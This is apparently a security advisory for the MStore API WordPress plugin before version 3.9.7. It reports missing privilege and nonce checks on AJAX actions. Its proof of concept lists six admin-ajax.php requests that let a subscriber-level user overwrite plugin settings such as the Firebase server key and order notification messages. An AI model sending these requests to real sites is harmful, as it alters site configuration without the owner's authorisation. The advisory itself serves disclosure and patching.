MStore API < 3.9.7 - Subscriber+ Unauthorized Settings Update

The plugin does not secure most of its AJAX actions by implementing privilege checks, nonce checks, or a combination of both.

PoC

Make sure the site also has WooCommerce installed and activated, then, while logged-in as a subscriber, visit the following URLs: - http://TARGET-SERVER/wp-admin/admin-ajax.php?action=mstore_update_limit_product&amp;limit;=99 - http://TARGET-SERVER/wp-admin/admin-ajax.php?action=mstore_update_firebase_server_key&amp;serverKey;=hacked - http://TARGET-SERVER/wp-admin/admin-ajax.php?action=mstore_update_new_order_title&amp;title;=1337 - http://TARGET-SERVER/wp-admin/admin-ajax.php?action=mstore_update_new_order_message&amp;message;=hacked+message - http://TARGET-SERVER/wp-admin/admin-ajax.php?action=mstore_update_status_order_title&amp;title;=1338 - http://TARGET-SERVER/wp-admin/admin-ajax.php?action=mstore_update_status_order_message&amp;message;=hacked+message Then, while logged-in as an administrator, visit /wp-admin/admin.php?page=mstore-plugin, and notice how the attacks have changed all the values.